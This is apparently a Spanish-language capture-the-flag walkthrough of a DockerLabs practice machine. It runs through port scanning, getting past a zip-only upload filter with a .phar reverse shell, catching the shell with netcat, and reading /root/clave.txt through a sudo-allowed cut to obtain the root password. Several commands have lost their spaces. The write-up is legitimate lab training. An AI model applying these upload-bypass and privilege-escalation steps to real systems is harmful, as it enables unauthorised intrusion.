Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipdockerlabs.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shdockerlabs.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap-p---open-sS--min-rate5000-vvv-n-Pn<IP>
nmap-sCV-p<PORTS><IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 12:03 EST
Nmap scan report for asucar.dl (172.17.0.2)
Host is up (0.000033s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Dockerlabs
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds
Si nos metemos en la pagina aparentemente no veremos nada interesante, por lo que fuzzearemos un poco:
Vemos varias cosas interesantes, entre ellas la pagina machine.php que nos llevara a un upload para poder subir un archivo, por lo que vamos a intentar crearnos una reverse shell subiendo un archivo .php.
Escalate user www-data
Si intentamos subir un archivo directamente con PHP nos aparecera esto:
No se permite la subida de archivos que no sean .zip
Pondremos el archivo en extension .phar para Bypassear el verificado, por lo que lo subiremos y nos iremos a la carpeta /uploads:
URL = http://<IP>/uploads/
Y antes de darle a nuestro archivo nos pondremos a la escucha.
nc-lvnp<PORT>
Seleccionamos el archivo en la web y si nos vamos a donde teniamos la escucha veremos que hemos obtenido una shell:
listening on [any] 7777 ...
connect to [192.168.120.128] from (UNKNOWN) [172.17.0.2] 46552
whoami
www-data
Escalate Privileges
Sanitizaremos la shell (TTY):
script/dev/null-cbash
# <Ctrl> + <z>sttyraw-echo; fgresetxtermexport TERM=xtermexport SHELL=/bin/bash# Para ver las dimensiones de nuestra consola en el Hoststtysize# Para redimensionar la consola ajustando los parametros adecuadossttyrows<ROWS>columns<COLUMNS>
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for www-data on a05f02578833:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User www-data may run the following commands on a05f02578833:
(root) NOPASSWD: /usr/bin/cut
(root) NOPASSWD: /usr/bin/grep
Por lo que vemos podemos ejecutar los binarios cut y grep como el usuario root, por lo que haremos lo siguiente:
Si nos vamos a /opt veremos una nota.txt que dice lo siguiente:
Protege la clave de root, se encuentra en su directorio /root/clave.txt, menos mal que nadie tiene permisos para acceder a ella.
Sabiendo esto haremos lo siguiente:
LFILE=/root/clave.txtsudocut-d""-f1"$LFILE"
Info:
dockerlabsmolamogollon123
Si probamos a poner como contraseña esa al usuario de root veremos que es dicha contraseña.
suroot
Metemos como contraseña dockerlabsmolamogollon123 y seremos root.